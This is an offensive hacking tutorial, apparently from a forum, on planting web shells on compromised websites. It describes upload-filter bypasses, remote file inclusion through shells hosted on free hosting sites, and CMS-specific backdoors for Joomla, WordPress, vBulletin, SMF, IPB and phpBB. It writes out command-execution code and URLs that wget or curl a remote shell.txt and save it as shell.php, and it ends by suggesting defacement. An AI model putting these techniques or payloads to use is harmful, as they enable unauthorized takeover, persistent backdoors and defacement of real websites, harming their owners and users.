Many newbie’s face problem while uploading shell on a site after getting admin access/ logging in to that site. So, I am writing this in order to help them. Basically shell gives us remote access to that server. Such shells are available in different language like php, asp/aspx, cgi etc. So, we have to choose a shell that will work on the server according to the server script. If the server supports php shell then we have to choose any of the php shell Otherwise asp & cgi. now, let’s come to the Main point…. AFTER LOGGING IN TO THE SITE IF WE FOUND ANY UPLOAD OPTION IN THE SITE , THEN WE CAN EASILY UPLOAD SHELL. But sometimes we have to do some changes to upload a shell.
Way 1
AS THE SHELL IS IN PHP FORMAT, SOMETIMES SOME SITES DOES NOT ALLOW UPLOADING SUCH SCRIPTS DIRECTLY WITH THE PHP EXTENTION. If so happens then just rename the shell name. Add .gif/.jpg/.html/.doc etc. Example: suppose before renaming the shell name was shell.php, then we will rename it as shell.php.jpg or anything else.
Way 2
Upload a simple uploader shell first that isn’t detected by Antivirus and firewalls. THEN UPLOAD YOUR SHELL THROUGH YOUR OWN SHELL. YOU CAN DOWNLOAD A UPLOADER SHELL FROM HERE .
WAY 3
FEW FIREWALL OF THE SERVER DETECTS THE SHELL SCRIPT BY CHECKING THE headers & don’t allow us to upload a shell. so we can bypass it by using “GIF89A SHELL SCRIPT BYPASS” Method. open your shell in notepad. add “GIF89a;” without quote before the shell code starts. liKe below…
GIF89a;
Depending on what kind of file validation they are using this may fool the Server Into thinking its a image since when it reads the file it finds the gif header and assuMes its safe since it’s a iMage.
WAY 4
This method is more advanced. This only works for client side filters rather than server side. download firebug for Firefox, then edit the html of the upload .
<form enctype=\"multipart/form-data\" action=\"uploader.php\" method=\"POST\"> Upload DRP File: <input name=\"Upload Saved Replay\" type=\"file\" accept=\"*.jpg\"/><br /> <input type=\"submit\" value=\"Upload File\" /> </form>
Change the filter accept. to *.* or just remove it completely , it will then let you upload any type of file.
WAY 5
Download “LIVE HTTP HEADERS” addon first for your firefox browser
1. Rename your shell name to shell.php.jpg (or whatever that site supports. In my case, site supports only jpg file. Thats why i renamed it to shell.php.jpg.)
2. Open Firefox & Start your Live HTTP Headers addon, after that upload your shell.
3. Then your Live HTTP Headers will look something similar to this
4. Then click on the shell.php.jpg, after click on Reply button.
5. Then again a new window will open, in that window there will be two boxes, but we have to work on second box.
6. In the second box, rename your shell.php.jpg to shell.php, then again click on Reply button
WAY 6
Find yourself a copy of edjpgcom.exe "edjpgcom is a free Windows application that allows you to change (or add) a JPEG comment in a JPEG file." Usage: -- edjpgcom "filename.jpg" Now add this to the jpg comment since you wont be able to drop a whole shell in there due to limits etc.
"; system($_GET['cmd']); echo ?>
now rename your jpg to .php and upload.
WAY 7
Another way you can fool the web server into thinking your uploading a image instead of a php shell is to get Firefox and install the “tamperdata” Add on then click start tamper and upload your php shell then tamper the data and change the content-Type from 'application/octet-stream' to 'image/jpeg'. If u have any problem to upload a shell using tamperdata, then just do a simple google search. So many video tutorials on this is available in web. So I am not explaining this step by step.
WAY 8
All the above mention way works when we find an upload button on the site. but when there is no upload button, it’s not easy to upload a shell there. we can try few things…… We have to find out if there is a edit option of an existing php/asp/aspx page. If there is a edit option then open that page & delete whole script. After that, open your shell in notepad. Copy the script, paste to that page. Finally, save it. Now that link will be your shell. possibly we can find edit option in the following pages of a site……
Contact us.php/ Contact us.asp
Class.php/ Class.asp
About us.php/about us.asp
Terms.php/terms.asp
nb: in some news, vehicles shelling, cart etc sites, don’t have any option to upload a file after logging in through admin panel. They only allow file upload after logging through cpanel.
WAY 9
SOME TIMES, IN SOME REMOTE FILE INCLUSION Vulnerable SITES, WE HAVE TO EXECUTE A SHELL FROM ANOTHER HOSTING SITE. METHOD……..
1) UPLOAD YOUR SHELL IN A FREE HOSTING SITE LIKE www.my3gb.com www.3owl.com , www.ripway.com , , www.000webhost.com , etc.
2) Now suppose your shelled site link is www.example.my3gb.com/c99.txt & YOUR VULNERABLE SITE IS www.site.com
3) Now we have to execute this following command to gain shell access to that site. http://www.site.com/v2/index.php?page=http://www.example.my3gb.com/c99.txt
4) REPLACE THE SITE LINK IN THE COMMAND ACCORDING TO YOUR SHELL & VULERABLE SITE LINK.
SHELL UPLOADING IN joomla, wp, vb, smf, ipb, mybb SITES
IN THOSE ABOVE MENTIONED SITE WE CANT FIND DIRECT UPLOAD OPTION GENERALLY. SO WE HAVE TO DO THEM IN OTHER WAYS.
1.Joomla Site:
After Login into adminpanel u will find Extensions on 5th No. expand this click on it > template Manager > check on any template (like beez,ja_purity) Now click on Edit (right upper side) after this click on Edit html now paste ur shell code and click save...done site.com/templates/template name/index.php like site.com/templates/beez/index.php
2.Wordpress:
login into admin panel expand Appearance then click on editor > u will find style.css now select 404.php on right side paste ur shell code and click edit file u can find shell in site.com/wp-content/themes/theme name u edit/404.php
3.Vbulletin:
1-Log in admin cp
2-Under “Plugins & Products”, select Add New Plugin
3-Adjust the settings as follows: Product: vBulletin Hook Location: global_start Title: (Anything …) Execution Order:
5 Code:
ob_start(); system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean();
Plugin is Active : Yes
4-After the plugin is added, go to the heading “Style and Design”, select “Style Manager
5-Under whatever the default style is in the dropdown menu, select Edit Templates.
6-Scroll ForumHome models and expand. Click [Customize] beside FORUMHOME.
7-Search Code:
$header Somewhere near the top. Replace it with: Code: $header $execcode
8-Now go to the forum and add after the index.php
Code:
?cmd=wget http://www.site.com/shell.txt;mv shell.txt shell.php
So it looks like Code:
http://www.site.com/pathtoforum/index.php?cmd=wget http://www.site.com/shell.txt;mv shell.txt shell.php
What this does is shell.txt downloads, and renames shell.php Now, the shell must be located in the directory shell.php forums … If not, then wget is disabled on that server, you can try alternative methods:
http://www.site.com/pathtoforum/index.php?cmd=curl http://www.site.com/shell.txt > shell.php
http://www.site.com/pathtoforum/index.php?cmd=GET http://www.site.com/shell.txt shell.php
4.SMF
login into admin panel u need to download any smf theme in zip format and put ur shell.php in it and save admin panel > select Themes and Layout > Install a new theme > browse and upload theme thats have our shell.php :) after upload shell will find > site.com/Themes/theme name/shell.php
5.IPB
login admin panel > Look and Feel >Manage Languages, choose language > section (example) public_help edit: help.txt Choose topic from list, or search for a topic In right box add the below code:
${${print $query='cd cache; wget http://link_to_shell/shell.txt;mv shell.txt shell.php'}} ${${system($query,$out)}} ${${print $out}}
When you add it, specify go on bottom Now we go on http://www.site.com/index.php?app=core&module=help And our code we add will be done, and you will get your shell @ www,site.com/cache/shell.php
6.phpBB
login into admin panel > go on styles -> templates -> edit, for Template file choose faq_body.html At down of:
We add:
fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i])); And save it.Now go on:
www.site.com/forum/faq.php?o=shell.php&i=http://link_to_shell.com/shel l.txt shell find in site path/shell.php
Mybb forum login admincp > Go to Templates and Styles, find default MyBB Theme is. Then go to Templates, expand templates that are used by the current theme. Find Calendar templates, click it. Click 'calender'. Above all the html code, paste this:
save :) shell will b find in site.com/calendar.php
note: if u got error like "code is danger unable to edit " then simply paste ur deface code to deface calendar.php
Thank you (zer0w0rm)